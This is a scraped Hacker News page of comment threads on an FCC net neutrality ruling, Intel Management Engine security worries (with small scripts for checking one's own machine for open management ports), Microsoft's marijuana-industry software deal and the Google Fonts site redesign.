But if your idea of preserving maximum internet freedom is in effect to place a loaded gun to its head and then declare it is not a problem because it is the good guys who control it and who therefore will use it only for good purposes, then you have what you want with utility-style regulation of the internet.

It might just work great as long as the good guys are in control. But what happens when it changes some day? And, if you think it cannot, then you have far, far more faith in human nature than I can possibly summon.

Welcome to the brave new world.

2
StavrosK 3 days ago 9 replies      
Can someone explain what this means? The term "net neutrality" has been muddled so much that I can't tell if it means what it actually says, or if it's distorted doublespeak that actually means the opposite.

Is this decision good or bad for us?

3
billiam 3 days ago 1 reply      
Second to last nail in the coffin. Yay. Sometimes the interests of hundreds of millions of people can in fact outweigh the interests of two corporations. With so many things about our society under attack, this is good news.
4
bcheung 3 days ago 0 replies      
What are the specifics in regard to peering? It seemed like with Netflix there was some confusion and FUD and it was hard to know the exact facts.

Normally as a business you are required to purchase bandwidth from bandwidth providers. I would assume this would still stand.

What counts as throttling? If an ISP has multiple peering connections with backbone providers are they forced to upgrade their hardware to compensate for all the traffic coming from their peer? If so, what counts as sufficient quality?

If they upgrade some peering connections and not others is that breaking Net Neutrality?

My understanding, not sure if it is correct, was that Netflix had traffic on an Internet backbone and Comcast was selectively throttling traffic within the peering connection based on whether it was Netflix traffic. I can see how that is discriminatory and wrong.

Anyone have more details about how all this works specifically?

5
russnewcomer 3 days ago 1 reply      
Generally glad that the order was upheld. I do wish that zero rating was more clearly defined, but regulation is just as much a reactive task as a proactive one, and it will be interesting to see how the ISPs use that tool in their toolbox. My suspicion is that we would see general price increases but then a 'zero rating' for, say, streaming video, making it seem like a good deal. Video seems cheaper but is really just subsidized by the rest of the content.

I see a parallel there to how the health insurance situation in America seems to have played out over the last few years from the view point of the average middle class developer.

6
shmerl 3 days ago 0 replies      
Good! What about efforts to repeal monopolistic state bans on municipal broadband? FCC was also in the middle of some court cases about it. Is there any progress?
7
dreamdu5t 3 days ago 2 replies      
Can someone explain why T-Mobile is legally allowed to provide free streaming for YouTube and Netflix? Didn't net neutrality prevent that? Or am I just out of the loop?

The thing is... I like them preferentially treating YouTube and Netflix traffic by not counting it towards my bandwidth limit. The "fair" alternative sucks: I would simply not stream on my phone anymore because it would be too expensive.

8
jojohack 3 days ago 1 reply      
Does this mean I can finally watch HBO GO on my PS4 via my Comcast account?
9
bcheung 3 days ago 1 reply      
How does this relate to high frequency trading and paying more to get access to servers closer to the exchange?

Is that paid prioritization / a fast lane? Or is that just purchasing a better plan?

Where is the line drawn?

10
nemock 3 days ago 0 replies      
I think it'll be a while before we are out of the woods on this one. The culprits continue to thumb their noses at the FCC and openly challenge its authority.
11
sova 3 days ago 0 replies      
Hurray for common sense!
12
daveheq 3 days ago 0 replies      
The politicians know they can never get past the technologists - not because the technologists make them so much money, but because the technologists are smarter than they are.
13
pmoriarty 3 days ago 1 reply      
Can ISPs still charge for more bandwidth?
14
dang 3 days ago 0 replies      
15
droopybuns 3 days ago 4 replies      
Tom Wheeler says this:

"Notably, the Open Internet Order does not affect zero-rating services like T-Mobile's BingeOn or Verizon's Go90, which are intentionally left out of the scope of the order. "I can argue there are some aspects of [zero rating] that are good, and I can argue theres some aspects of it that are not so good," Wheeler told The Verge in an interview in March. "The job of the regulator is to figure out, 'Okay, now how do I deal with this?'"

Outrageous behavior, followed up by outrageous commentary. This FCC is out of control. How does anyone invest in wireless with regulators like this? Is Tom Wheeler even aware of the chilling effect of commentary like this?

Edit: The quote above is from the fine article.

Wmeredith: Who I'm talking about is Tom Wheeler, chair of the FCC. In this particular quote, the regulator of the laws is saying (at least as far as I can tell) that he's going to pick and choose which players he regulates. Should I assume you're arguing that my quote from the article is FUD, or is it my commentary? Or my interpretation of it?

I'm not being a troll. I have an honest disagreement that this is the right thing to do. Would you invest in any climate with a regulator who says things like this? It seems wildly more risky to me.

5
The Intel ME subsystem can take over your machine, can't be audited boingboing.net
625 points by cylo  2 days ago   265 comments top 47
1
nneonneo 1 day ago 3 replies      
Igor Skochinsky (of IDA Hex-Rays fame, among others) has been studying Intel ME for quite some time. He gave a nice talk at Breakpoint summarizing what he'd discovered (slides here [pdf]: https://github.com/skochinsky/papers/blob/master/2014-10%20%...).

Among other things, he finds that ME is capable of running signed Java code which is pushed to the device. Due to the complexity and size of the Java code, it's quite likely to have bugs.

ME is a bit scary partly because it's a totally closed-source and proprietary component of your computer with full and essentially unfettered access to everything - RAM, peripherals, and network I/O. Any bug in a publicly-accessible component would have the potential to do serious damage. For example, a bug in the network stack might make it possible for attackers to remotely own your box.

2
kriro 1 day ago 3 replies      
Joanna Rutkowska has written a nice paper on the topic, highly recommended: http://blog.invisiblethings.org/papers/2015/x86_harmful.pdf

Edit:There's also a talk from 32c3 for those more inclined to watch a video. I am pretty worried ever since I watched that: https://www.youtube.com/watch?v=rcwngbUrZNg

(which is why I have researched non-Intel laptop alternatives... cliff notes: GPUs without blobs are hard to find, and there will be some severe tradeoffs, which is expected)

3
Philipp__ 1 day ago 3 replies      
And this is why a monopoly by one giant monolith is bad, in any area or case! They get to do whatever the f they want! It's not like everything is made today to track us and give access to "authorities" when they want it. But what really drives me mad is that I feel tricked! You put trust in someone and their work, and give them money for it, but they do this without you even knowing.

I always made fun of sworn GNU guys; I thought they were blowing things out of proportion. But maybe they were on the right track! Anyhow, I want a more competitive CPU space; we need AMD to get back in the game, IBM's POWER9, ARM, anything. But as things stand right now, we won't see that anytime soon.

4
markokrajnc 1 day ago 4 replies      
It may be that Intel didn't plan this as an NSA/XYZ back door - but it doesn't actually matter. What matters is that we know 1) Intel has this technology implemented in almost all desktops/servers currently running, and 2) those machines can be accessed remotely (even over GSM) to perform reads/writes.

Example misuse: somebody can put illegal stuff on your machine and then sue you...

(Intel has marketed this feature to big companies so they can format the HDD remotely over GSM in case a laptop is stolen.)

5
captainmuon 1 day ago 2 replies      
Very naively, I wonder what happens if you just call Intel and complain about this. Say you want a way to remove the ME completely. They won't help you, but I wonder how they will justify making it compulsory if pressed.

Now if I call them, I wouldn't reach anybody important. But surely there are a couple of people on HN who are lawyers, CEOs, with the government etc.? If you have an imposing job and a few minutes to spare, I'd like to see what Intel has to say about this.

6
fineforyouo 1 day ago 1 reply      
I wish the European Commission would study this problem and, if the firms are found guilty, impose a fine of such a kind and quantity that they cannot continue exposing their clients to possible economic damage.

The previously imposed fine was EUR 1.06 billion.

Someone with the required knowledge should submit a detailed account of this potential hazard to the European Commission, emphasizing how this system could expose clients to threats, its anticompetitive nature (since it could allow hackers to gain access to economic secrets), and many other important points.

The FSF should stand up and speak clearly. I hope the FSF executes its mission: to gather the necessary strength to expose the nature and extent of these problems and how to fight them.

Those who impose on us tools that allow them to control our businesses, steal our ideas and plans, and plague our enterprises with chaos, those who strive to bend our future to their will, should be fined.

I certainly hope that a new fine is imposed. That measure would send a strong message and set a new precedent aimed at those threatening our liberty and economy: a message encoded in an economic hammer with the power to make them respect our freedom and integrity.

To be Free and Survive we should Fight. FSF.

7
confounded 1 day ago 3 replies      
I'm very surprised that no-one on HN has talked about their experiences of using AMT for enterprise IT management. Aside from the security problems, I've personally never encountered or seen its use, which makes the ME's inclusion (on all chips, for about 6 years) seem like an odd decision from Intel.
8
digler999 2 days ago 2 replies      
No doubt various three-letter agencies are having a field-day with this right now.

Hopefully a Robin Hood type will reverse-engineer the blob and post a permanent fix to disable this thing before a more nefarious person/group uses it to devastate the PC landscape with something even worse than bitlocker.

9
shmerl 2 days ago 2 replies      
Why can't Intel implement proper security and open up this blob to begin with? Not opening it and not allowing it to be disabled suggests it's intended for something sinister.
10
EdSharkey 1 day ago 0 replies      
The fact that the ME microcontroller can run arbitrary Java code, uploaded at runtime rather than read from ROM, is pernicious. The Intel private key can sign any blob, and ME will run it.

It makes me wonder: could a Java program uploaded to ME crash it or put it into an infinite loop? What would the effect be on the host OS if ME suddenly became unresponsive?

Perhaps a "Kill ME" binary could be developed as open source, and perhaps we could get Intel to sign it? If there were a strong enough request to Intel by consumers, why wouldn't they go ahead and sign it for us? No skin off their noses what we do with our consumer-grade boxes, right?

11
ksk 1 day ago 0 replies      
I think at this point pretty much anything on your PC is backdoorable. I can't think of a single device in my computer that doesn't respond to "magic I/O packets" which are undocumented (obviously) and prone to bugs (possibly).

Gaming mouse? Yeah send some I/O packets and you can change the DPI, USB update rate, whatever. A write-protected USB device? Uh-huh, send some magic-packets to the controllers to reset it/format it/whatever (Recently did this with one of those Dell USB Mentor Media drives that they ship the OS on). Access point? Yeah, send some magic packets and you can set the password/SSID/whatever. Hard Disk? undocumented SATA commands allows for reprogramming. This is just the 'easy' way, without going into JTAG and other diagnostic interfaces.

12
slasaus 1 day ago 0 replies      
FWIW, there is a petition for Intel to release an ME-less CPU design: https://puri.sm/posts/petition-for-intel-to-release-an-me-le...

(as mentioned in a comparable thread five days ago: "Intel and ME, and why we should get rid of ME" (fsf.org) https://news.ycombinator.com/item?id=11880935)

13
oneplane 1 day ago 1 reply      
While that article is correct, it's full of FUD with the constant littering of 'secret' and 'take over' in the text.

We already know about Igor's research and the published ARC CPU reverse engineering, "Ring -3" rootkits and the DEF CON presentations. This is bad, and this needs even more reverse engineering so at some point we might add an 'open' replacement for the required ME functions and run it together with say, LibreBoot/CoreBoot.

I wonder why no NDA'd ME or ARC docs have leaked yet; even some of the Broadcom SoCs had docs leak, and via cleanroom design proper FOSS drivers were created for some of the wireless parts... this should be possible with the Intel ME as well. Hell, even FOSS versions, or at least partially reverse-engineered and modified versions, of laptop EC firmware have popped up on the 'net.

14
brudgers 1 day ago 0 replies      
The thing about scale is that it doesn't look like ordinary individual experience. It ain't enough to run Core2 / Piledriver / POWER / open-source microcode: ME-enabled computers are connected en masse to the network. The choices are air gap or head in the sand. ME was inside before Snowden.

Google, Facebook, Amazon, eBay, Microsoft, etc. buy Xeons by the bucketful. They're Intel's customers that matter. The retail box that comes with a fan for sale at NewEgg is just exhaust fumes. 42 or "It's the cloud": take your pick. Managing a gazillion-server data center by hand just ain't practical.

Intel's customers that matter replace CPU assets on the IRS's three year depreciation schedule. It's why this [0] and why ME. Security by obscurity isn't so bad when dumping the vulnerable subsystem lowers overall costs for other reasons [performance boosts and lower power consumption].

ME is a good reason that Microsoft has been striving toward multiplatform. It no longer has such a big say in Intel's roadmap. Yes UEFI and the Windows 10 upgrade process kinda suck, but Microsoft ain't pwn'ing anyone's computer because Intel already pwn'd it. ME going sideways at scale would hurt and Microsoft would be the handy victim.

There's a strategic reason Apple is making its own chips.

[0]: http://www.techspot.com/review/1155-affordable-dual-xeon-pc/

15
morganvachon 2 days ago 5 replies      
Nice breakdown of how ME works, but nothing new here.

Still, I'm glad I hold on to a ton of older, pre Core i-series Intel machines, AMD machines, and ARM boards. If ME is ever truly compromised at least I have a fallback or three.

16
hoodoof 1 day ago 1 reply      
If you get a microscope and manage to peer into this secret hidey hole in the CPU you will see a bunch of tiny little NSA spooks, Russian and Chinese hackers scuttle away to hide in other dark hidden secret corners of the Intel CPU.
17
rdtsc 1 day ago 5 replies      
I think it's time for AMD or IBM's POWER8/9 to step in. If anything, a little good PR vis-a-vis the "rootkit nightmare waiting to happen in your server" would be nice.
18
endgame 1 day ago 5 replies      
Where can people go if they want a fully-libre machine and are willing to sacrifice x86?
19
DiabloD3 1 day ago 4 replies      
I find people freaking out about this extremely strange.

AMT is Intel's equivalent of IPMI. It is a non-standard implementation of it, and does not follow any of the relevant specifications. It does not integrate into most server management platforms.

AMT costs extra. Most mobos do not have it enabled as you have to pay Intel's tax on it, even if some of the hardware to enable it is in every northbridge.

A motherboard must implement it to be available. Most of the motherboards we own don't have it enabled. You cannot "break into it" if AMT isn't available on your motherboard to begin with.

Not all ME chips can run it due to Intel's requirements.

Now, is the ME chip a threat? Possibly, but not as much as your cell phone's baseband modem is. The baseband modem can talk to outside networks; ME can't unless it is paired with a NIC it can talk to (Intel does not require mobos to have this, and generally motherboards meant for AMT ship with Intel NICs, but not always).

Without AMT, the only thing the ME does is implement management functions that allow you to actually boot and use the machine.

In the article, it says "Personally, I would like if my ME only did the most basic task it was designed for, set up the bus clocks, and then shut off," except it is kept running so you can properly sleep and wake your machine, change CPU frequencies at run time (i.e., idle the CPU), and get access to the sensors on the motherboard.

In addition, the ME handles Intel Smart Connect, which is also not available on all boards (Apple uses this to implement Power Nap). It also requires licensing, the same way AMT does, and many mobo manufacturers simply don't want to license it.

ME does not connect to the network if it doesn't have a payload that is able to do so (AMT, Smart Connect).

The reason people don't understand what the ME is for is that all of the basic tasks the ME performs used to be done by lots of custom hardware, much of it not provided by Intel and different on every board, and a bit of a driver nightmare.

I don't like standing up for Intel, but anti-ME articles that continually bring up AMT as if all computers have it are FUD. Very few computers have AMT, very few computers implement this OOB access, and very few computers could implement AMT even if Intel let you purchase licensing for it after purchasing the hardware.

I'm not saying that ME is not a security hazard (it can be in some cases), but it isn't some ultra awesome NSA backdoor bullshit. Your phone, however, does have the NSA backdoor.

20
narrator 1 day ago 3 replies      
Almost makes you want to get a Lemote Laptop like Richard Stallman.
21
textmode 2 days ago 3 replies      
Taking another angle: what if the computer's owner wants to use it to access her computer remotely? Are there instructions for how to do this? Is it feasible?

If not, then there seems to be little justification for having a relatively new feature like this turned on by default. Who is this feature really for? If it's not for all users, then why is activation mandatory in CPUs after Core2?

I mean, if ME has to be active, then the computer's owner should be able to use it, right?

23
optimiz3 2 days ago 3 replies      
Serious question: are AMD chips a viable alternative (from a security standpoint)? I hear their new Zen chips are coming soon.
24
bArray 1 day ago 2 replies      
My question is whether alternatives such as AMD or ARM are secure. I imagine the ARM architecture is too heavily scrutinised and too low-power to get away with that sort of thing?

Personally, I want to buy a laptop that is secure, because I travel to questionable places; in light of this, I am now wondering whether it will include an Intel CPU.

25
Illniyar 2 days ago 1 reply      
That's crazy talk. In what world is it OK for my CPU to run a TCP stack on its own?
26
throw2016 1 day ago 5 replies      
This adds a whole new dimension to 'Intel Inside'. It says exactly what anyone needs to know.

If it's for enterprise features, as 'innocently' suggested, then those who do not need or want this feature should be able to turn it off simply, without drama, debate, or discussion.

It's not surprising that both AMD and ARM have it. This is an orchestrated effort signifying the win of paranoia and security over privacy in the western world.

This war is being fought on too many fronts by well resourced and paranoid security agencies with all the tools to influence and the only defense would be individuals and our sense of right and wrong. But it seems individuals have been completely disempowered and reduced to survival mode and are not in a position to stand up for the right thing or even talk about it.

If 'moral' individuals can so easily be quietened in well off economies then one wonders what happens in other economies where basic survival is a day to day fight. Who will fight the privacy war? The silence is deafening. It seems all the activism and racket from media, academics, NGOs and human rights organizations only come into play when a western political or strategic objective needs to be met.

There are many who believe that by working with and supporting security agencies they are somehow at the forefront of a nebulous fight for survival and freedom in a dark world. This 'dark world' is a self-created and self-serving fantasy, and it's a comedy that grown, well-adjusted, and well-read individuals fall for it; it pushes humanity into a negative space.

It can be taken for granted, unless conclusively proved otherwise (with the burden of evidence now swaying the other way), that any technology coming out of the USA and Europe is completely compromised, and that the fight for privacy here has been lost.

27
Animats 1 day ago 1 reply      
The real question is what the firmware can be convinced to do remotely. Probably most of the things in here.[1] Remote management is supposed to be listening on TCP ports 623 for HTTP and 664 for HTTPS.

[1] http://www.dmtf.org/sites/default/files/standards/documents/...
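
For anyone curious, a plain TCP probe is enough to see whether a machine on your own network exposes any of these management ports; a minimal Python sketch (the target host is a placeholder, and the list adds 16992/16993, the ports commonly associated with AMT's web UI, to the 623/664 mentioned above):

  import socket

  # 623/664 per the comment above; 16992/16993 are the ports
  # commonly associated with AMT's web UI.
  MGMT_PORTS = [623, 664, 16992, 16993]

  def is_open(host, port, timeout=2.0):
      # Return True if a plain TCP connection to host:port succeeds.
      try:
          with socket.create_connection((host, port), timeout=timeout):
              return True
      except OSError:
          return False

  host = "192.168.1.10"  # placeholder: the machine to check
  for port in MGMT_PORTS:
      state = "open" if is_open(host, port) else "closed/filtered"
      print("{}:{} {}".format(host, port, state))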

28
wfunction 1 day ago 1 reply      
Can someone tell me if people have actually spotted the Intel ME doing unauthorized communication?

I imagine it should be easy to spot in any network firewall log (note I said network, not OS). And in reality, if it's never been observed to communicate with the outside world without explicitly being told to, then do people really need to worry?
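
One rough way to look for it in practice, assuming an iptables-style log that records destination ports as DPT= fields (the log path and format here are assumptions):

  import re

  # Flag traffic to ports associated with out-of-band management.
  SUSPECT_PORTS = {"623", "664", "16992", "16993"}
  DPT = re.compile(r"DPT=(\d+)")

  with open("/var/log/firewall.log") as log:  # placeholder path
      for line in log:
          match = DPT.search(line)
          if match and match.group(1) in SUSPECT_PORTS:
              print(line.rstrip())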

29
cocomutator 1 day ago 2 replies      
I still don't understand why this ME feature was created to begin with. Assuming that breaking it is a matter of time (someone clever enough thinking about it for long enough), it seems like a serious security vulnerability, worse still because an attack would be undetectable.

Why create it in the first place? Are the enterprise uses the article mentions worth the risk?

30
happycube 1 day ago 1 reply      
Amusingly, the ARC core in the Intel ME is a descendant of the SNES SuperFX chip.
31
hoodoof 1 day ago 2 replies      
Strange that Intel gives people more reason to go to other processors like ARM when Intel is under such pressure from competition.
32
nthcolumn 1 day ago 0 replies      
33
ssebastianj 1 day ago 1 reply      
I wasn't aware of Intel ME until I recently bought a brand new Lenovo ThinkPad and saw the "Intel Management Engine" entry in the BIOS/UEFI boot menu.

The thing is: how can I configure this ME thing in order to avoid (or minimize, at least) possible attacks?

34
xlayn 1 day ago 0 replies      
I would use Thunderbolt, since it has DMA: create a CRC/F(x) CPU (an external unit connected through Thunderbolt) that converts/encrypts code and data into the format expected by modified code generated by a compiler, making the Intel CPU act as a surrogate and delegating control to the CRC/F(x) CPU.

Extra points: make all the CPUs work, and create extra tasks to run on the unused CPUs to obscure the actual process running (yeah, I know it's not energy efficient, but someone has to give Intel inspiration to improve).

35
dingdingdang 1 day ago 1 reply      
One thing: OK, so we have this super fantastic network-enabled Java platform running autonomously from within around 3 billion devices across the globe since 2006, with the capability to read everything from the systems it runs on, completely unnoticed... shouldn't this generate a FAIR amount of network traffic (and resulting suspicious log files, if not on the computers then on the routers), or am I missing something here?!
36
sspiff 1 day ago 0 replies      
I knew about ME, but I didn't know it had an ARC processor in it. Odd that Intel didn't opt for an in-house design, like one of their older cores backported to a newer process (a P54 or 386, say).
37
elchief 1 day ago 0 replies      
Has anyone on here actually used this at work?
38
hugdru 1 day ago 1 reply      
Oh my god, it began with the OEMs installing a bunch of spyware on the default install, much of it with vulnerabilities. Not to mention "modern" OSes not respecting users' privacy. To make matters worse, the hardware companies decided to follow suit and thus added unwanted and compromising features to everyday systems. Way to go! It seems I'll have to switch to stone age hardware just to have a little peace of mind. Evolution! >(
39
LeoPanthera 2 days ago 6 replies      
Does this apply to Macs?
40
milkey_mouse 1 day ago 0 replies      
Finally, the ME is getting the exposure it deserves. Seems like just two weeks ago nobody knew it existed.
41
jorblumesea 1 day ago 0 replies      
It's probably safe to say that every device you own or have ever owned has a back door, intentional or not. The sense of security people had about their machines was always a myth; glad to see it finally die.
42
arca_vorago 1 day ago 1 reply      
When it comes to hardware backdoors, one particular case seems to keep popping up in my mind, and that is Bill Hamilton of the infamous Inslaw/Promis octopus debacle. A few years ago, when I was a regular on Schneier's blog, he was claiming they had prearranged the backdoor installation at the silicon manufacturing level...

Something about that has never left my mind, and I suspect it's generally correct. Here's hoping that POWER8 workstation Talos gets off the ground... or some RISC equivalent.

43
SeanDav 1 day ago 0 replies      
Once a malicious 3rd party gets the keys to this kingdom it is game over.
44
ohitsdom 1 day ago 2 replies      
Maybe I missed it in the article, but why is this only present on x86 chips? How do 64-bit processors from Intel offer the same management functionality without this ME subsystem?
45
vasili111 2 days ago 1 reply      
What about AMD?
46
oolongCat 1 day ago 0 replies      
Best way to deal with issues like this: make them care. How? We need to get this message to the masses, to get enough people to know about this potential issue that it becomes an organisational issue for Intel.
47
pmarreck 1 day ago 0 replies      
Yo dawg...
6
Microsoft is the first big company to say it's serving the legal marijuana trade nytimes.com
496 points by ghshephard  1 day ago   210 comments top 26
1
edoceo 1 day ago 2 replies      
I make https://weedtraqr.com/ - we are operational in Washington and Oregon - and now apparently compete with MS.

The company Microsoft is working with (Agrisoft) doesn't even operate in WA or OR yet, and has been sold twice in the last two years (first to Surna[0], then to Kind[1]).

Additionally, their "partnership" is really just Agrisoft getting free Azure hosting. The headline is pure click-bait.

[0] http://www.prnewswire.com/news-releases/surna-inc-acquires-m...

[1] http://www.prnewswire.com/news-releases/kind-financial-acqui...

2
delbel 1 day ago 4 replies      
The system Oregon (and Colorado) uses for recreational is called METRC and is made by a company called Franwell. When I was at training, the spokesperson actually asked for a show of hands if anyone knew what a REST API was. Their seed-to-sale tracking system (required by law in Oregon), if used for food, would be able to tell you which corn field, and which corn plant, in Iowa went into a hamburger you just ate, plus when and what fertilizer was used (to draw an analogy) -- might be a little overkill, but it's what the current recreational law requires. The METRC web UI is Bootstrap-based, I think, and is very nice. I haven't looked at the REST API yet, but their system integrates with RFID tags on the plants and packages, with chain-of-custody-style controls. http://www.metrc.com/ I am a user of their system.
3
dragonwriter 1 day ago 6 replies      
There is no legal marijuana trade in the US, as all marijuana trade is criminal under federal law, and it's generally a crime to knowingly profit from a crime (and, since drug offenses are covered in RICO, it's another crime to use any profits tied to them in the operation of any business engaged in interstate commerce).

Microsoft may be keeping distant enough not to worry (though perhaps not, given their formal partnership with Kind, even if their own offering is only to governments), but Kind is basically betting its business -- and the personal liberty of its decision makers -- on the willingness of the federal government to extend the informal prosecutorial tolerance of in-state, state-law-compliant marijuana activities to larger interstate enterprises (and on that tolerance continuing at all, which it might well not under a different administration).

4
kbenson 1 day ago 2 replies      
This makes sense. As a big player in enterprise, Microsoft is recognizing that there's a new industry that's vastly underserved.
5
godzillabrennus 1 day ago 3 replies      
Good. Maybe they can open a cafe on their campus to sell recreational versions so their people can test their tech and try the product.

It'd make many developers I know want to work for Microsoft.

6
pboutros 1 day ago 1 reply      
Explains what was going on when they bought LinkedIn.

/s

7
mwsherman 1 day ago 0 replies      
This is a good example of the enormous chilling effect that legal risk creates. Not just prohibition of drugs, but any large regulatory regime where it's hard to say what's legal.

Big categories of software go underdeveloped, leaving an industry in the dark ages. It's one reason why medical software is so bad: being on the wrong side of legal risk is too dangerous.

8
pritam2020 1 day ago 2 replies      
So will we have a new metric, like the Ballmer Peak?
9
Drakim 1 day ago 3 replies      
What is the legality of marijuana on the federal level in the US? I was under the impression that even if marijuana is legal on a state level you can still get in trouble for it.
10
MikeHolman 1 day ago 0 replies      
Regardless of actual amount of effort Microsoft is putting here, just putting their feet in the water and showing interest is a very smart move. Marijuana is poised to become a multibillion dollar industry, and Microsoft (being based in WA) is in a unique position among the tech giants to capitalize.
11
drawkbox 1 day ago 0 replies      
Imagine not getting in early on tobacco or alcohol markets. That created tons of wealth.

Companies are smart to hop on the end of another prohibition that will be quite lucrative. It is an immense blue ocean.

12
romanovcode 1 day ago 0 replies      
I think they do it because they can. Smaller companies are too afraid; MS is too big, and they are not going away if someone doesn't like it.

Good to hear, nevertheless.

13
bashmohandes 1 day ago 0 replies      
Gives a whole new meaning to Cloud Computing.
14
musgrove 22 hours ago 0 replies      
This seems like a pretty sure sign that they know what the decision will be about re-classifying pot. Not to mention legalizing it nationally. I would hope.
15
vegabook 1 day ago 4 replies      
Wow, Microsoft is tickin' all the cool boxes under Nadella. Never seen such a radical and, it seems, effective corpo image turnaround. Open source? Check. Ubuntu on Windows? Check. Contribute to BSD? Check. Progressive on pot? Check. Defeat the bots? Check. Gates on chickens? Check. This company is sick/dope/ice cold cool.
16
donw 1 day ago 0 replies      
Pretty sure that distinction goes to Taco Bell...
17
Animats 1 day ago 0 replies      
This is more like "Kind becomes Microsoft Certified Solution Provider". Not really big news.
18
Razengan 22 hours ago 0 replies      
I'm still hoping for Apple to release macOS Weed someday.
19
antsam 22 hours ago 0 replies      
Did somebody make a joke about "the cloud" yet?
20
anonbanker 1 day ago 0 replies      
You couldn't pay us[0] to use a microsoft product. We'll stick with OpenBravo[1] and OpenAG Initiative[2] to handle all our enterprise resource needs from seed to customer.

0. http://medicalcannab.is

1. http://www.openbravo.com/

2. https://github.com/OpenAgInitiative

21
hans 1 day ago 0 replies      
well then the chatbots are going to get much better ;]
22
joaoaccarvalho 1 day ago 0 replies      
Job interviews be like: "How often do you smoke marijuana?"
23
planetmcd 1 day ago 0 replies      
Maybe that is why they forced the latest update?
24
dreamdu5t 1 day ago 0 replies      
What a cumbersome, wasteful, unnecessary regulatory system.

It says a lot about the US that the food they eat does not have this level of monitoring and regulation (to track outbreaks like E. coli) but marijuana does, despite not killing anyone.

25
pi-squared 1 day ago 1 reply      
Accidental or purposeful "weed" in the photo behind the knee of the guy on the main pic?
26
Roboprog 1 day ago 0 replies      
So, they'll be plugging in the TVs^H^H^H Monitors for some of the more out of it customers???

(with apologies to Cheech & Chong)

Green Screen of Somnolence???

7
Google Fonts Redesigned fonts.google.com
547 points by uptown  3 days ago   258 comments top 61
1
di 3 days ago 6 replies      
If anyone is curious about the sample text:

* "All their equipment and instruments are alive." (Mr. Spaceship, by Philip K. Dick)

* "A red flair silhouetted the jagged edge of a wing." (The Jewels of Aptor, by Samuel R. Delany)

* "I watched the storm, so beautiful yet terrific." (Frankenstein, by Mary Shelley)

* "Almost before we knew it, we had left the ground." (A Trip to Venus, by John Munro)

* "A shining crescent far beneath the flying vessel." (Triplanetary, by E. E. Smith)

* "It was going to be a lonely trip back." (Youth by Isaac Asimov)

* "Mist enveloped the ship three hours out from port." (The Jewels of Aptor, by Samuel R. Delany)

* "My two natures had memory in common." (Strange Case of Dr Jekyll and Mr Hyde, by Robert Louis Stevenson)

* "Silver mist suffused the deck of the ship." (The Jewels of Aptor, by Samuel R. Delany)

* "The face of the moon was in shadow." (Mr. Spaceship, by Philip K. Dick)

* "She stared through the window at the stars." (The Millionaire's Convenient Bride, by Catherine George) ????

* "The recorded voice scratched in the speaker." (Deathworld, by Harry Harrison)

* "The sky was cloudless and of a deep dark blue." (A Trip to Venus, by John Munro)

* "The spectacle before us was indeed sublime." (A Trip to Venus, by John Munro)

* "Then came the night of the first falling star." (The War of the Worlds, H. G. Wells)

* "Waves flung themselves at the blue evening." (The Jewels of Aptor, by Samuel R. Delany)

2
ocdtrekkie 3 days ago 9 replies      
"Your browser is not currently supported. Google Fonts works best on Chrome, Firefox, or Safari."

Google still treating Edge users like trash, I see[0]. Microsoft Edge works fine for the vast majority of websites, and a block like this telling you to get a different browser is incredibly painful. If you tell me I need a different browser, I'm going to find a different company or website to do business with.

[0]Gmail pesters Edge users weekly to switch to Chrome. Unlike other browsers, where pressing 'not interested' causes it to go away permanently, it returns weekly like a bad rash.

3
mortenjorck 3 days ago 1 reply      
This is a gorgeous redesign that really lets the typography shine, as well as deftly addressing numerous usability issues with the old site. The family size filter in particular makes finding a usable set of weights much easier, and the featured section adds a welcome new layer of curation.

Two minor observations:

- It would be a great addition to the family size slider to be able to filter for "contains italics." Some font families have a broad set of stroke weights, but aren't usable for certain content because they lack italics.

- A nitpick, but "Handwriting" has always seemed a somewhat suboptimal filter label. Many of the fonts contained therein might be better described as "script" or "calligraphic", while "handwriting" connotes something more strictly vernacular.

All said, this is an excellent update that brings the Google Fonts experience into the realm of subscription services like Typekit.

4
SEMW 3 days ago 10 replies      
Looks great in Chrome, completely broken in Firefox: https://i.imgur.com/XRMgcHp.png.
5
Sir_Cmpwn 3 days ago 2 replies      
God dammit https://sr.ht/xkFx.png

Never, ever, ever disable functionality based on someone's user agent. Just let it be broken, because spoiler alert: it's probably usable anyway.

6
zy1t 3 days ago 3 replies      
This redesign is awesome, but I think it might have killed my side project.

I've been working on a site that offers Google Fonts with better visuals and search-by-font-feature (x-height, stroke contrast, etc.) functionality.

I've sunk 30+ hours into designing and coding up the front end while my friend works on programmatically tagging the fonts on the backend.

I want to continue working on my project, but it now feels a lot less relevant. Any advice, HN?

For the curious, here's a wireframe of the main screen:https://www.dropbox.com/s/vzobxm2a2ul9y5l/main%20search.png?...

7
chrismorgan 3 days ago 2 replies      
This is nice and all (apart from an astonishing, even for Google, degree of browser compatibility regression), but what I really want is for the actual fonts to be updated. Crimson Text, for example, is an outdated version of the font, which this release breaks a little further. Upstream (https://github.com/skosch/Crimson) has seen substantial improvements, but Google has never updated it, ignoring the author's pleas.
8
thedaemon 3 days ago 1 reply      
I kept looking at the fonts to see what changes they made. Then I realized that the website was redesigned, not the fonts. Perhaps the title should be changed to reflect this?
9
cickpass_broken 3 days ago 2 replies      
Todd Motto did a bit of an analysis of the client-side Angular performance: https://mobile.twitter.com/toddmotto/status/7427897282573557...

"Google Fonts is doing some amazing work on performance, no ng-repeats - superfast DOM rendering. "

10
makecheck 10 hours ago 0 replies      
I'm not sure why, but interfaces that consist only of red and black text look very unpleasant to me. I felt the same way when Apple started using red and black for things like iOS calendar highlights.

I suspect the reason is that they are both strong colors that compete for attention: black-on-white is high contrast, and red is a color that generally jumps out from the page due to the eye's perception of red. To keep the colors from competing, one of the text colors should be softer (and if they must have red, they should soften it to something closer to pastel or pink).

11
rakstrooper 3 days ago 2 replies      
Why does Google deliberately ensure that their websites don't work with Microsoft browsers?
12
hanniabu 3 days ago 1 reply      
I'm not sure how I feel about all these different phrases. I think it's easier to pick out which font I like when all the phrases are the same. The phrase "the quick brown fox jumps over the lazy dog" has been a great one because it contains every letter of the alphabet, so you can see how every letter will look at once.
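
That pangram property is trivial to verify, in case anyone wants to test candidate phrases of their own; a quick standard-library check:

  import string

  phrase = "the quick brown fox jumps over the lazy dog"
  # Letters of the alphabet not present in the phrase (empty for a pangram).
  missing = set(string.ascii_lowercase) - set(phrase)
  print("pangram!" if not missing else "missing: " + "".join(sorted(missing)))
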
13
frenchie4111 3 days ago 1 reply      
I still have the same problem I had with the old UI: the only reason I come to this site is to get the copy/paste one-liner to put a certain font on my site, but every time it takes me a few minutes to find it.
14
michaelmrose 3 days ago 1 reply      
